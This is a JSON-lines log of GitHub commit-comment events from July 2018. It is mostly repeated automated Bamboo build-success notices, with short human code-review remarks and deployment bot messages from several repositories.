{"id":"7957983218","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689287,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-12T18:34:02Z","updated_at":"2018-07-12T18:34:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:34:02Z"}
{"id":"7957984106","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689289,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-12T18:34:12Z","updated_at":"2018-07-12T18:34:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:34:12Z"}
{"id":"7957984398","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29689291,"position":null,"line":null,"path":null,"commit_id":"257734d0906ce11d8f372dd4f22182fb14b3212b","created_at":"2018-07-12T18:34:16Z","updated_at":"2018-07-12T18:34:16Z","author_association":"NONE","body":"@AgelxNash this commit is not on 2.x yet either. The changes I made to dashboard are in develop and so as long as the rest of the commits are added in later I do not need to add again."}},"created_at":"2018-07-12T18:34:16Z"}
{"id":"7957985059","type":"CommitCommentEvent","actor":{"login":"JRunix"},"repo":{"name":"JRunix/EduForge"},"payload":{"comment":{"id":29689293,"position":null,"line":null,"path":null,"commit_id":"7b7899984bd5e080a1c0c907ad281415fae4b819","created_at":"2018-07-12T18:34:24Z","updated_at":"2018-07-12T18:34:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a subproject for frontend development](https://trello.com/c/WuC1OU7l/3-create-a-subproject-for-frontend-development)"}},"created_at":"2018-07-12T18:34:24Z"}
{"id":"7957985171","type":"CommitCommentEvent","actor":{"login":"VladyslavTselousov"},"repo":{"name":"VladyslavTselousov/VladyslavTselousov.github.io"},"payload":{"comment":{"id":29689294,"position":null,"line":null,"path":null,"commit_id":"27fa9d141d7843b6640c4d5a278b2e9dc65bfec7","created_at":"2018-07-12T18:34:26Z","updated_at":"2018-07-12T18:34:26Z","author_association":"OWNER","body":"npm install -> npm run start"}},"created_at":"2018-07-12T18:34:26Z"}
{"id":"7957985652","type":"CommitCommentEvent","actor":{"login":"ddelpiano"},"repo":{"name":"MetaCell/NetPyNE-UI"},"payload":{"comment":{"id":29689297,"position":null,"line":null,"path":null,"commit_id":"9f6f06f3e0e5d28433efa9241040e78053867960","created_at":"2018-07-12T18:34:31Z","updated_at":"2018-07-12T18:34:31Z","author_association":"CONTRIBUTOR","body":"@tarelli @adrianq the cns18 branch does not exists, there is the CNS18 branch.\r\nIf the images is built on *nix systems using the dockerfile this might fail.\r\nEither we push CNS18 or we modify the dockerfile.\r\nThanks."}},"created_at":"2018-07-12T18:34:31Z"}
{"id":"7957986280","type":"CommitCommentEvent","actor":{"login":"ggallici"},"repo":{"name":"aocoda/Tp-Arena"},"payload":{"comment":{"id":29689302,"position":20,"line":34,"path":"src/main/java/repositorios/RepositorioEstudiantes.java","commit_id":"62f1a904a1e2e4c4ba3b72f77259fea8884e8666","created_at":"2018-07-12T18:34:39Z","updated_at":"2018-07-12T18:34:39Z","author_association":"COLLABORATOR","body":"Turbio ese casteo jaja"}},"created_at":"2018-07-12T18:34:39Z"}
{"id":"7957987394","type":"CommitCommentEvent","actor":{"login":"ggallici"},"repo":{"name":"aocoda/Tp-Arena"},"payload":{"comment":{"id":29689305,"position":26,"line":39,"path":"src/main/java/repositorios/RepositorioEstudiantes.java","commit_id":"62f1a904a1e2e4c4ba3b72f77259fea8884e8666","created_at":"2018-07-12T18:34:53Z","updated_at":"2018-07-12T18:34:53Z","author_association":"COLLABORATOR","body":"turbio ese static"}},"created_at":"2018-07-12T18:34:53Z"}
{"id":"7957989398","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689310,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-12T18:35:16Z","updated_at":"2018-07-12T18:35:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:35:16Z"}
{"id":"7957989713","type":"CommitCommentEvent","actor":{"login":"olaven"},"repo":{"name":"olaven/starter-react-webstore"},"payload":{"comment":{"id":29689311,"position":null,"line":null,"path":null,"commit_id":"e43b524f9f776ed4ef7966da9c4154b6213ccb89","created_at":"2018-07-12T18:35:19Z","updated_at":"2018-07-12T18:35:19Z","author_association":"OWNER","body":"Fix #5 "}},"created_at":"2018-07-12T18:35:19Z"}
{"id":"7957989858","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689312,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-12T18:35:21Z","updated_at":"2018-07-12T18:35:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:35:21Z"}
{"id":"7957990192","type":"CommitCommentEvent","actor":{"login":"cacheclear"},"repo":{"name":"cacheclear/laracasts"},"payload":{"comment":{"id":29689315,"position":null,"line":null,"path":null,"commit_id":"bd4c0a4552b8b01034098abd76e9f901c99f221a","created_at":"2018-07-12T18:35:24Z","updated_at":"2018-07-12T18:35:24Z","author_association":"OWNER","body":"Sets return value to true cause every user should be able (authorized) to register himself/herself"}},"created_at":"2018-07-12T18:35:24Z"}
{"id":"7957990879","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"m3db/tally-cpp"},"payload":{"comment":{"id":29689321,"position":null,"line":null,"path":null,"commit_id":"02d318548a2babedd381ec5fe215429d63b796e9","created_at":"2018-07-12T18:35:33Z","updated_at":"2018-07-12T18:35:33Z","author_association":"NONE","body":"Please don't use bazel. Use CMake like everyone else!"}},"created_at":"2018-07-12T18:35:33Z"}
{"id":"7957991578","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29689323,"position":null,"line":null,"path":null,"commit_id":"5ac17603a280f2f3a0694fbf56b7c43ec45caa3c","created_at":"2018-07-12T18:35:41Z","updated_at":"2018-07-12T18:35:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T18:35:41Z"}
{"id":"7957993780","type":"CommitCommentEvent","actor":{"login":"crok"},"repo":{"name":"crok/crokrammgmtfix"},"payload":{"comment":{"id":29689326,"position":5,"line":5,"path":"common/tweak","commit_id":"c46501861cb3e9633f993cdf45a39d763fe5e941","created_at":"2018-07-12T18:36:07Z","updated_at":"2018-07-12T18:36:07Z","author_association":"OWNER","body":"Thank you for the suggestion but IMHO it is practically impossible to handle *all* Android devices with profiles and try to modify all kind of devices individually - and this supposed to be a simple & general tweak module. I suggest not to use it if device is getting unstable. It is easy to remove it from Magisk Manager. Feel free to fork or simply copy the settings without stopping perfd.  : )"}},"created_at":"2018-07-12T18:36:07Z"}
{"id":"7957995545","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689328,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-12T18:36:27Z","updated_at":"2018-07-12T18:36:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:36:27Z"}
{"id":"7957995666","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689331,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-12T18:36:28Z","updated_at":"2018-07-12T18:36:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:36:28Z"}
{"id":"7957995745","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689332,"position":null,"line":null,"path":null,"commit_id":"0ad239353462eca05db88a67a7e6e8928d111e54","created_at":"2018-07-12T18:36:29Z","updated_at":"2018-07-12T18:36:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-183628 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-183628\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:36:29Z"}
{"id":"7957996333","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29689335,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-12T18:36:36Z","updated_at":"2018-07-12T18:36:36Z","author_association":"CONTRIBUTOR","body":"@orivej Doesn't that hydra page say that it worked at the beginning of the range, and broke by the end?"}},"created_at":"2018-07-12T18:36:36Z"}
{"id":"7957996612","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689336,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-12T18:36:39Z","updated_at":"2018-07-12T18:36:39Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-12T18:36:39Z"}
{"id":"7957998767","type":"CommitCommentEvent","actor":{"login":"laijuren41"},"repo":{"name":"laijuren41/Stocklock-Holmes-Stock-Analysis"},"payload":{"comment":{"id":29689343,"position":null,"line":null,"path":null,"commit_id":"df85dccd6382d0060debda36815e01bd291e6ddb","created_at":"2018-07-12T18:37:05Z","updated_at":"2018-07-12T18:37:05Z","author_association":"OWNER","body":"Main Program for scrapping and also predicting"}},"created_at":"2018-07-12T18:37:05Z"}
{"id":"7958001287","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689349,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-12T18:37:33Z","updated_at":"2018-07-12T18:37:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:37:33Z"}
{"id":"7958001781","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689352,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-12T18:37:39Z","updated_at":"2018-07-12T18:37:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:37:39Z"}
{"id":"7958004495","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689359,"position":117,"line":88,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/second.java","commit_id":"c9aafa9767cef6605e8be36c36b1ec20d6f3a5cb","created_at":"2018-07-12T18:38:10Z","updated_at":"2018-07-12T18:38:10Z","author_association":"NONE","body":"Make sure you got the permission to get this, otherwise, you are going to crash the app."}},"created_at":"2018-07-12T18:38:10Z"}
{"id":"7958007149","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689367,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-12T18:38:40Z","updated_at":"2018-07-12T18:38:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:38:40Z"}
{"id":"7958008308","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689371,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-12T18:38:52Z","updated_at":"2018-07-12T18:38:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:38:52Z"}
{"id":"7958010566","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689375,"position":null,"line":null,"path":null,"commit_id":"2c06b81a945149aeaac41395ed4483667e2caf31","created_at":"2018-07-12T18:39:19Z","updated_at":"2018-07-12T18:39:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-183917 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-183917\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:39:19Z"}
{"id":"7958011224","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689376,"position":18,"line":18,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:39:26Z","updated_at":"2018-07-12T18:39:26Z","author_association":"NONE","body":"KEY_USERNAME this is a key not a username. Same for the password."}},"created_at":"2018-07-12T18:39:26Z"}
{"id":"7958012975","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689381,"position":44,"line":44,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:39:46Z","updated_at":"2018-07-12T18:39:46Z","author_association":"NONE","body":"Avoid italian in the code."}},"created_at":"2018-07-12T18:39:46Z"}
{"id":"7958013249","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689382,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-12T18:39:50Z","updated_at":"2018-07-12T18:39:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:39:50Z"}
{"id":"7958014347","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689386,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-12T18:40:05Z","updated_at":"2018-07-12T18:40:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:40:05Z"}
{"id":"7958016493","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689391,"position":50,"line":50,"path":"SharedPref/app/src/main/java/com/example/simonedigiorgio/sharedpref/MainActivity.java","commit_id":"16a044b69b0c8ff3e8496e992ebf6ef1872d4f90","created_at":"2018-07-12T18:40:29Z","updated_at":"2018-07-12T18:40:29Z","author_association":"NONE","body":"Use the constant and DO NOT hardcode the key here."}},"created_at":"2018-07-12T18:40:29Z"}
{"id":"7958018885","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689394,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T18:40:59Z","updated_at":"2018-07-12T18:40:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:40:59Z"}
{"id":"7958020380","type":"CommitCommentEvent","actor":{"login":"hughsie"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29689396,"position":null,"line":null,"path":null,"commit_id":"9cc84a1b35839ceccaa41c0b5ef156d68bb55be4","created_at":"2018-07-12T18:41:17Z","updated_at":"2018-07-12T18:41:17Z","author_association":"OWNER","body":"Looks like `--force` was required; fixed in master -- thanks."}},"created_at":"2018-07-12T18:41:17Z"}
{"id":"7958020531","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689398,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-12T18:41:19Z","updated_at":"2018-07-12T18:41:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:41:19Z"}
